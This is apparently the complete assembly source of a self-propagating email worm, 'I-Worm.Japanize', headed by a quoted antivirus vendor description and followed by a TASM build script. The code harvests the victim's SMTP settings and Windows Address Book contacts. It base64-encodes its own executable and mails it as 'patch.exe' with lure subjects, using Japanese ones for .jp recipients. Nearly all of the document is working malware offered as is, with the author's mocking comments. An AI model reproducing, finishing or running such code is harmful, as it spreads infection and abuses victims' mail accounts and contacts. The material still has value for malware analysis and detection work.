;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ;;; I-Worm.Japanize ;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ;;; ;;; ;;; This has some bugs. ;;; ;;; Here TrendMicro description: ;;; ****************************************************************** ;;; http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=WORM_FBOUND.B&VSect=T ;;; Details: ;;;The details of the email this worm arrives with may be as follows: ;;; ;;;To: ;;;Subject: <"Important" or random Japanese text(applicable on Japanese supported platforms)> ;;;Message Body: ;;;Attachment: patch.exe ;;; ;;;It uses its own SMTP engine and uses the following registry key to retrieve the default SMTP server of the infected system: ;;;HKEY_CURRENT_USER\Software\Microsoft\ ;;;Internet Account Manager\Accounts\00000001 ;;; ;;;It uses the following registry key to retrieve email addresses from the infected user's Windows Address Book (WAB): ;;;HKEY_CURRENT_USER\Software\Microsoft\WAB\ ;;;WAB4Wab File Name = “” ;;; ;;;The email arrives with the attachment PATCH.EXE. If the email address of its target ;;;user ends with the extension .jp, the worm randomly selects a phrase, from a list of 17 possible Japanese phrases below, and uses one as the subject of the email: ;;; ;;; ;;;The English translation for the above Japanese text are as follows: ;;;Re: the issue that you mentioned ;;;Re: important ;;;Re: long time no see ;;;Re: top secret ;;;Re: Hello ;;;Re: important information ;;;Re: data ;;;the issue that you mentioned ;;;important ;;;long time no see ;;;top secret ;;;hello ;;;important information ;;;data ;;;frog ;;;shit ;;;shit ;;; ;;;Otherwise, it uses the subject “Important." ;;; ;;;This non-destructive worm does not drop files or create any registry entries. Its propagation depends on the execution of the file attachment in the email. ;;; ;;;The following text strings are found in the worm body: ;;; ;;;‘XXXXXXXXXXXXXXXXXXXXXXX’ ;;;‘XXXXX I-Worm.Japanize XXXXX’ ;;;‘XXXXXXXXXXXXXXXXXXXXXXX’ ;;; ;;; .586p .model flat locals jumps ;;; some lazy shit callW macro @@@x extrn @@@x:proc call @@@x endm ofs equ offset dwo equ dword ptr wo equ word ptr by equ byte ptr HKEY_CURRENT_USER EQU 80000001h CRLF equ <13,10> rdtsc equ AF_INET equ 2 SOCK_STREAM equ 1 FILE_ATTRIBUTE_NORMAL EQU 00000080h GENERIC_READ EQU 80000000h GENERIC_WRITE EQU 40000000h PAGE_READONLY EQU 00000002h PAGE_READWRITE EQU 00000004h FILE_MAP_READ EQU 00000004h OPEN_EXISTING EQU 00000003h GHND EQU 042h FILE_SHARE_READ EQU 00000001h FILE_SHARE_WRITE EQU 00000002h ;;; ---------------------------------------------------------------- .data hReg dd ?; registry handle str_SMInternetAccountManager db 'Software\Microsoft\Internet Account Manager',0 str_SMIAccounts db 'Software\Microsoft\Internet Account Manager\Accounts\' AccountIdx db 9 dup(?); account index bufsiz_accountidx dd 9; size str_DMA db 'Default Mail Account',0 str_SMTPNAME db 'SMTP Server',0 str_SMTPEmailAddr db 'SMTP Email Address',0 str_SMWab4 db 'Software\Microsoft\WAB\WAB4\Wab File Name',0 SMTP_Server db 50 dup(?) ; default smtp server bufsiz_SMTPSERVER dd 50 morons_Mailaddr db 256 dup(?) ; mail address of moron :) bufsiz_morons_mailaddr dd 256 wab4_path db 260 dup(?); wab file path bufsiz_wab4_path dd 260 buffer db 1000 dup(?) hwab4file dd ? ; wab4 file handle hwab4map dd ? ; hwab4mapview dd ? ; myfilename db 260 dup(?) ; handle of myself hmyfile dd ? fsize dd ? ; file size hmemout0 dd ? ptr_myself dd ? hmemout dd ? ; globalalloc ptr_base64buf dd ? ; globallock target_mailaddr db 48h dup(?) ; sockaddr_in label byte ; sin_family dw ? sin_port dw ? sin_addr dd ? sin_zero db 8 dup(?) len_sockaddr_in = $ - ofs sockaddr_in sock dd ? ; socket descriptor recv_buffer db 1024 dup(?) ; recv buffer jflag dd 0 ; japanese or not smtp_HELO db 'HELO localhost',CRLF len_smtp_HELO = $ - ofs smtp_HELO smtp_MAIL_FROM db 'MAIL FROM: ' len_smtp_MAIL_FROM = $ - ofs smtp_MAIL_FROM ;crlf smtp_RCPT_TO db 'RCPT TO: ' len_smtp_RCPT_TO = $ - ofs smtp_RCPT_TO ;crlf smtp_DATA db 'DATA',CRLF len_smtp_DATA = $ - ofs smtp_DATA smtp_BODY_FROM db 'FROM: ' len_smtp_BODY_FROM = $ - ofs smtp_BODY_FROM smtp_BODY_TO db CRLF,'TO: ' len_smtp_BODY_TO = $ - ofs smtp_BODY_TO smtp_BODY_SUBJECT db CRLF,'SUBJECT: Important',CRLF len_smtp_BODY_SUBJECT = $ - ofs smtp_BODY_SUBJECT smtp_DOT_CRLF db '.',CRLF len_smtp_DOT_CRLF = $ - ofs smtp_DOT_CRLF smtp_QUIT db 'QUIT',CRLF len_smtp_QUIT = $ - ofs smtp_QUIT smtp_crlf db CRLF smtp_MIME_h db 'MIME-Version: 1.0',CRLF db 'Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"',CRLF db CRLF db '--Boundary-a8dfidaoRadvfuck',CRLF db 'Content-Type: text/plain; charset=iso-2022-jp',CRLF db 'Content-Transfer-Encoding: 7bit',CRLF db 'Content-Description: Mail message body',CRLF db CRLF db CRLF ; text db CRLF db '--Boundary-a8dfidaoRadvfuck',CRLF db 'Content-Type: application/x-msdownload; name="patch.exe"',CRLF db 'Content-Disposition: attachment; filename="patch.exe"',CRLF db 'Content-Transfer-Encoding: BASE64',CRLF db CRLF len_smtp_MIME_h = $ - ofs smtp_MIME_h ;; base64 body smtp_MIME_e db CRLF,'--Boundary-a8dfidaoRadvfuck--',CRLF,CRLF len_smtp_MIME_e = $ - ofs smtp_MIME_e r_seed dd 10987293h ; random seed smtp_jsubject_1 db CRLF,'SUBJECT: =?ISO-2022-JP?B?' len_smtp_jsubject_1 = $ - ofs smtp_jsubject_1 smtp_jsubject_2 db '?=',CRLF len_smtp_jsubject_2 = $ - ofs smtp_jsubject_2 ;;; japanese subjects table japanese_subjects label byte dd ofs js_01 dd ofs js_02 dd ofs js_03 dd ofs js_04 dd ofs js_05 dd ofs js_06 dd ofs js_07 dd ofs js_08 dd ofs js_09 dd ofs js_10 dd ofs js_11 dd ofs js_12 dd ofs js_13 dd ofs js_14 dd ofs js_15 dd ofs js_16 dd ofs js_17 num_of_jsub = ($ - ofs japanese_subjects)/4 js_01 db 'GyRCPUVNVxsoQg==',0 ; 重要 js_02 db 'UmU6GyRCPUVNVxsoQg==',0; Re:重要 js_03 db 'GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; 重要なお知らせ js_04 db 'UmU6GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; Re:重要なおしらせ js_05 db 'GyRCTmMkTjdvGyhC',0 ; 例の件 js_06 db 'UmU6GyRCTmMkTjdvGyhC',0; Re:例の件 js_07 db 'GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; お久しぶりです js_08 db 'UmU6GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; Re:お久しぶりです js_09 db 'GyRCJDMkcyRLJEEkTxsoQg==',0; こんにちは js_10 db 'UmU6GyRCJDMkcyRLJEEkTxsoQg==',0; Re:こんにちは js_11 db 'GyRCNktIaxsoQg==',0 ; 極秘 js_12 db 'UmU6GyRCNktIaxsoQg==',0; Re:極秘 js_13 db 'GyRCO3FOQRsoQg==',0 ; 資料 js_14 db 'UmU6GyRCO3FOQRsoQg==',0; Re:資料 js_15 db 'GyRCMz8bKEI=',0 ; ウソコ js_16 db 'GyRCJSYlYxsoQlI=',0 ; ウソコ js_17 db 'GyRCJCYkcyQzGyhC',0 ; うんこ .code start: callW GetTickCount mov dwo [r_seed],eax jmp @@go ;; signature :) db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0 db 'XXXXX I-Worm.Japanize XXXXX',0 db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0 @@go: call get_some_info push ofs buffer push 0101h callW WSAStartup test eax,eax jnz exit call open_wab test eax,eax jnz clean_sock call create_base64enc call spread free_mem: push dwo [ptr_base64buf] callW GlobalUnlock push dwo [hmemout] callW GlobalFree close_wab4: push dwo [hwab4file] push dwo [hwab4map] push dwo [hwab4mapview] callW CloseHandle callW CloseHandle callW CloseHandle clean_sock: callW WSACleanup exit: push 0 callW ExitProcess spread: ;; lifewire ;) mov esi,dwo [hwab4mapview] mov ecx,[esi+64h] ; num of addr jecxz @@exit add esi,[esi+60h] ; ptr to addr @@spread_loop: push ecx mov eax,esi cmp by [esi+1],0 jne @@nounicode push esi lea edi,target_mailaddr push edi push 48h pop ecx @@1: lodsw stosb loop @@1 pop eax pop esi add esi,20h @@nounicode: call spread2 add esi,24h pop ecx loop @@spread_loop @@exit: ret spread2: push esi mov esi,eax ; now esi=email addr push 0 push 1 push 2 callW socket mov dwo [sock],eax mov wo [sin_family],AF_INET mov ax,25 xchg al,ah mov wo [sin_port],ax push ofs SMTP_Server callW gethostbyname test eax,eax jz @@exit mov eax,[eax+12] mov eax,[eax] mov eax,[eax] mov dwo [sin_addr],eax push len_sockaddr_in lea eax,sockaddr_in push eax push dwo [sock] callW connect test eax,eax jnz @@exit call sendmail @@exit: pop esi ret ;;; --- ;;; reg stuff get_some_info: xor ebx,ebx push ofs hReg push 1 push ebx push ofs str_SMInternetAccountManager push HKEY_CURRENT_USER callW RegOpenKeyExA test eax,eax jnz @@error push ofs bufsiz_accountidx push ofs AccountIdx push ebx push ebx push ofs str_DMA push dwo [hReg] callW RegQueryValueExA test eax,eax jnz @@error push dwo [hReg] callW RegCloseKey push ofs hReg push 1 push ebx push ofs str_SMIAccounts push HKEY_CURRENT_USER callW RegOpenKeyExA test eax,eax jnz @@error push ofs bufsiz_SMTPSERVER push ofs SMTP_Server push ebx push ebx push ofs str_SMTPNAME push dwo [hReg] callW RegQueryValueExA test eax,eax jnz @@error push ofs bufsiz_morons_mailaddr push ofs morons_Mailaddr push ebx push ebx push ofs str_SMTPEmailAddr push dwo [hReg] callW RegQueryValueExA test eax,eax jnz @@error push dwo [hReg] callW RegCloseKey push ofs hReg push 1 push ebx push ofs str_SMWab4 push HKEY_CURRENT_USER callW RegOpenKeyExA test eax,eax jnz @@error push ofs bufsiz_wab4_path push ofs wab4_path push ebx push ebx push ebx push dwo [hReg] callW RegQueryValueExA test eax,eax jnz @@error push dwo [hReg] callW RegCloseKey xor eax,eax ret @@error: xor eax,eax dec eax ret open_wab: xor ebx,ebx push ebx push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push ebx push FILE_SHARE_WRITE push GENERIC_READ push ofs wab4_path callW CreateFileA inc eax jz @@error dec eax mov dwo [hwab4file],eax push ebx push ebx push ebx push PAGE_READONLY push ebx push eax callW CreateFileMappingA mov dwo [hwab4map],eax push ebx push ebx push ebx push FILE_MAP_READ push eax callW MapViewOfFile mov dwo [hwab4mapview],eax xor eax,eax ret @@error: xor eax,eax dec eax ret create_base64enc: push 260 push ofs myfilename push 0 callW GetModuleFileNameA xor ebx,ebx push ebx push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push ebx push FILE_SHARE_READ push GENERIC_READ push ofs myfilename callW CreateFileA inc eax jz @@error dec eax mov dwo [hmyfile],eax push 0 push dwo [hmyfile] callW GetFileSize mov dwo [fsize],eax add eax,100h push eax push GHND callW GlobalAlloc mov dwo [hmemout0],eax push eax callW GlobalLock mov dwo [ptr_myself],eax push 0 push ofs recv_buffer push dwo [fsize] push eax push dwo [hmyfile] callW ReadFile test eax,eax jz @@eexit push 0 push dwo [hmyfile] callW GetFileSize push eax ; save size shl eax,1 ; eax*2 push eax push GHND callW GlobalAlloc mov dwo [hmemout],eax push eax callW GlobalLock mov dwo [ptr_base64buf],eax ; pop ebx ; restore size ; push ebx ; size push eax push dwo [ptr_myself] call base64encode push dwo [hmyfile] callW CloseHandle push dwo [ptr_myself] callW GlobalUnlock push dwo [hmemout0] callW GlobalFree xor eax,eax ret @@eexit: push dwo [hmyfile] callW CloseHandle push dwo [ptr_myself] callW GlobalUnlock push dwo [hmemout0] callW GlobalFree @@error: xor eax,eax dec eax ret base64encode proc pascal arg @@src arg @@dest arg @@srclen mov esi,dwo [@@src] mov edi,dwo [@@dest] @@b64loop: xor eax,eax cmp dwo [@@srclen],1 jne @@srclen2 lodsb push 2 pop ecx mov edx,03D3Dh ; == dec dwo [@@srclen] jmp @@b64next @@srclen2: cmp dwo [@@srclen],2 jne @@srclen3 lodsw push 3 pop ecx push 03dh pop edx sub dwo [@@srclen],2 jmp @@b64next @@srclen3: lodsd push 4 pop ecx xor edx,edx dec esi sub dwo [@@srclen],3 @@b64next: bswap eax @@b64n_loop: mov ebx,eax and eax,0FC000000h rol eax,6 mov al,[@@b64table + eax] stosb mov eax,ebx shl eax,6 dec ecx jnz @@b64n_loop cmp dwo [@@srclen],0 ja @@b64loop mov eax,edx stosd ret @@b64table db "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" endp g_send: ;; in ;; ecx = size ;; esi = ptr to data ;; out ;; eax = ret value of send() push 0 push ecx push esi push dwo [sock] callW send ret g_recv: ;; out ;; error -> eax=-1 success -> eax = 0 @@again: push 0 push 1024 push ofs recv_buffer push dwo [sock] callW recv inc eax jz @@recv_error cmp eax,1024 jz @@again xor eax,eax ret @@recv_error: xor eax,eax dec eax ret sendmail: ;; yea. lame routine ;) push esi ; mail addr mov dwo [jflag],0 ; flag for .jp ;; call g_recv ;; lea esi,smtp_HELO mov ecx,len_smtp_HELO call g_send call g_recv ;; lea esi,smtp_MAIL_FROM mov ecx,len_smtp_MAIL_FROM call g_send push ofs morons_Mailaddr callW lstrlen mov ecx,eax lea esi,morons_Mailaddr call g_send mov ecx,2 lea esi,smtp_crlf call g_send call g_recv ;; mov ecx,len_smtp_RCPT_TO lea esi,smtp_RCPT_TO call g_send pop esi push esi push esi callW lstrlen push eax ; save mov ecx,eax call g_send mov ecx,2 lea esi,smtp_crlf call g_send call g_recv ;; .jp? pop eax ; len of mail address pop esi push esi ; mail address add esi,eax sub esi,3 cmp dwo [esi],00706a2eh ; .jp? jne @@1 inc dwo [jflag] @@1: ;; lea esi,smtp_DATA mov ecx,len_smtp_DATA call g_send call g_recv ;; lea esi,smtp_BODY_FROM mov ecx,len_smtp_BODY_FROM call g_send push ofs morons_Mailaddr callW lstrlen mov ecx,eax lea esi,morons_Mailaddr call g_send lea esi,smtp_BODY_TO mov ecx,len_smtp_BODY_TO call g_send pop esi push esi push esi callW lstrlen mov ecx,eax call g_send cmp dwo [jflag],0 jnz @@jsubject mov ecx,len_smtp_BODY_SUBJECT lea esi,smtp_BODY_SUBJECT call g_send jmp @@body @@jsubject: ;; gen subject mov ecx,len_smtp_jsubject_1 lea esi,smtp_jsubject_1 call g_send mov esi,(num_of_jsub-1) call rng lea esi,japanese_subjects mov esi,dwo [esi+eax*4] push esi callW lstrlen mov ecx,eax call g_send mov ecx,len_smtp_jsubject_2 lea esi,smtp_jsubject_2 call g_send @@body: lea esi,smtp_MIME_h mov ecx,len_smtp_MIME_h call g_send mov esi,dwo [ptr_base64buf] push esi push esi callW lstrlen pop esi mov ecx,eax call g_send lea esi,smtp_MIME_e mov ecx,len_smtp_MIME_e call g_send mov ecx,len_smtp_DOT_CRLF lea esi,smtp_DOT_CRLF call g_send call g_recv ;; mov ecx,len_smtp_QUIT lea esi,smtp_QUIT call g_send call g_recv pop esi ret rng: ;; in ;; esi = range ;; out ;; eax = random number rdtsc xor eax,edx imul eax,dwo [r_seed] dec eax mov dwo [r_seed],eax xor edx,edx div esi mov eax,edx ret end start ************************************************************************* @ECHO OFF TASM32 /ml /m /z japanize.asm,japanize.obj TLINK32 -x -aa -Tpe japanize.obj,,,%import32.lib DEL *.OBJ